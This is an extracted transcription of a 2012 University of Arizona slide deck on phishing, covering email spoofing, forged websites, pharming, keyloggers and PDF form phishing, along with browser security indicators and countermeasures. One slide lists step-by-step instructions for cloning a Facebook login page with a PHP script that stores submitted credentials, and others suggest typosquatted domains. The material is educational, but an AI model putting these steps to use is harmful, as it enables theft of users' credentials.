Transcription
PhishingJunxiao Shi, Sara SaleemUniversity of ArizonaApr 23, 2012
1 Introduction2 Email Spoofing3 Web Spoofing4 Pharming5 Malware6 Phishing through PDF7 References
What is Phishinga form of social engineeringto fraudulently retrieve legitimate users’ confidential orsensitive credentialsby mimicking electronic communications from a trustworthyor public organizationin an automated fashion
PhisherLabor specialization of phishers:Mailers send out a large number of fraudulent emails (usuallythrough bot-nets), which direct users to fraudulent websitesCollectors set up fraudulent websites (usually hosted oncompromised machines), which actively prompt users toprovide confidential informationCashers use the confidential information to achieve a pay-out
Information Flowphisher(mailer)phisher(casher)1752 63Financial InstitutionUser (victim)4phisher(collector)Information flow in a phishing attack
1 Introduction2 Email Spoofing3 Web Spoofing4 Pharming5 Malware6 Phishing through PDF7 References
Email SpoofingDefinition: sending an email that claims to be originatingfrom one source, when it was actually sent from another.DiscoverCard members are more likely to believe in an emailfrom support@discover.com than from an unrelateddomain.When you believe in an email, you may take actions accordingto its instructions, such as:reply to the email with your credit card numberclick on the link labelled as “view my statement”, and enteryour password when the website prompts for itopen an attached PDF form, and enter confidentialinformation into the form
Email SpoofingRead the report for:Why email spoofing is so easy?How to send a spoofed email with one line of command?What are the countermeasures?
1 Introduction2 Email Spoofing3 Web Spoofing4 Pharming5 Malware6 Phishing through PDF7 References
Web Spoofing1Set up a forged website2Attract traffic to the forged website3Collect confidential information entered by users
Creating a forged website1Save the Facebook login page as an HTML file, along withimages and scripts.2Write a PHP script that stores the submitted fields into a fileor database, then redirect to the real Facebook.3Open the HTML file with a text editor, find the login form,and change the submission URL to that PHP script.4Upload these files to a PHP-enabled web server.-or1Configure a “reverse proxy” using squid or Fiddler2.2Write a plug-in that automatically collects information enteredby users.
Attracting traffic to forged websiteSend spoofed emails with a link to the forged website.Register a domain that is a common typo, such asfacebok.com.(Facebook registered this domain before you)Register the same domain name in a different TLD. Forexample, register facebook.com.cn, and translate the forgedwebsite to Chinese.Use pharming.
Legitimate website VS forged websitehttps://www.phish-no-phish.com/How to tell whether a website is legitimate or forged?contentdomain nameusage of httpscertificate
Browser Security Indicator: https padlockHTTPS, the combination of Hypertext Transfer Protocol andTransport Layer Security, provides encryption and identificationthrough public key infrastructure. Modern web browsers display apadlock icon when visiting an https website.http scheme, no padlockhttps scheme, padlock in address bar
Browser Security Indicator: https padlockIf the certificate is invalid or does not match the domain name,modern browsers will show a prominent warning.a warning page is shown ondetecting an untrustedcertificateif the user chooses to continue, addressbar turns red
Browser Security Indicator: EVExtended Validation (EV) Certificates are only issued afterextensive verification on the requesting entity: physical presence,domain control, legal documents.Modern browsers “turn green” to indicate higher level of trust.
Browser Security Indicator: domain name highlightingPhishers tend to use misleading addresses, such , todeceive users. With domain name highlighting, users can easilyinterpret the address and identify the current website at a glance.
Simulated Browser Attackhttps? Yes.Padlock? Yes.Green addressbar? Yes.Trusted?public terminal in Student Union Memorial CenterFood Court
Simulated Browser Attackbut, is this a real Internet Explorer?Probably not.A web page or Flash movie simulates the user interface andbehavior of Internet Explorer.2 Address bar, padlock icon, status bar are all fake.3 Open in a chromeless window or enter full screen mode.1Everything you enter goes to the phisher; web pages you seemay be modified by the phisher.That’s why you shouldn’t use online banking on publiccomputers.
1 Introduction2 Email Spoofing3 Web Spoofing4 Pharming5 Malware6 Phishing through PDF7 References
PharmingPharming: a type of attack intended to redirect traffic to a fakeInternet host.Read the report for:DNS cache poisoning, and its countermeasuresDomain hijacking, the pharming method with global effectsLong term, unnoticeable pharming in local computer or ahome network
1 Introduction2 Email Spoofing3 Web Spoofing4 Pharming5 Malware6 Phishing through PDF7 References
MalwareMalware: a piece of software developed either for the purposeof harming a computing device or for deriving benefits from itto the detriment of its user.In phishing, malware can be used to collect confidentialinformation directly, and send them to phishers.Keystrokes, screenshots, clipboard contents, and programactivities can be collectedMalware can display a fake user interface to actively collectinformation.Collected information can be automatically sent to phishers byemail, ftp server, or IRC channel.
KeyloggerREFOG Free Keylogger configuration
KeyloggerSign in to Windows Live Messenger
KeyloggerWindows Live ID and password collected by keylogger
Read from text input controlMalware can read password from a text input control, even if it’sdisplayed as asterisks.Asterisk Password Recovery reads a password from SkyDrive login page
MalwareMalware can also aid other phishing techniques:for web spoofinginstall phisher’s CA certificate as a trusted root CA, sobrowser will not show the warning page when visiting aspoofed https websitefor pharmingchange the hosts file or DNS settingsrun ARP spoofing on local Ethernetenlist into botnetssend spoofed emailsserve forged websites
Countermeasure: client security productsClient security products are widely deployedAnti-virus productsMalicious Software Removal Tool (monthly from MicrosoftUpdate)They are not always effectiveIt’s easy to modify malware so that it doesn’t contain anyknown signatureThere are techniques to bypass certain behavior-baseddetection
Countermeasure from China Merchants Bank online banking clientUSB tokensecure the text input control, so that (most) keyloggerscannot intercept keystrokes or read its contentencrypt confidential information in memory and over networkprovide mutual authentication by client and server certificates
1 Introduction2 Email Spoofing3 Web Spoofing4 Pharming5 Malware6 Phishing through PDF7 References
Why is this possiblePDF: Most popular & trusted document description format.PDF programming language: Strong execution features whichcan be exploited.
Illustrationfake tax return form received in a spoofed email
How does it work?SubmitForm actionUpon invocation of a SubmitForm action, names and valuesof selected interactive form fields are transmitted to thespecified URL / email.Recipient URL or email address is set at the time the form iscreated.
1 Introduction2 Email Spoofing3 Web Spoofing4 Pharming5 Malware6 Phishing through PDF7 References
References: BooksJakobsson, M., & Myers, S. (2007). Phishing andcountermeasures: Understanding the increasing problem ofelectronic identity theft. Hoboken, N.J: Wiley-Interscience.James, L. (2005). Phishing exposed. Rockland, MA: Syngress.ISO 32000-1:2008 Document management – Portabledocument format – Part 1: PDF 1.7
References: Online ResourcesVeriSign .comWindows Live SkyDrive https://skydrive.live.com
References: SoftwareWindows 8 Developer Preview 516Windows Live Essentials sentials-homeREFOG Free Keylogger lAsterisk Password Recovery very.htmlChina Merchants Bank personal banking e Reader http://get.adobe.com/reader/
REFOG Free Keylogger con guration. Keylogger Sign in to Windows Live Messenger. Keylogger Windows Live ID and password collected by keylogger. Read from text input control Malware can read password from a
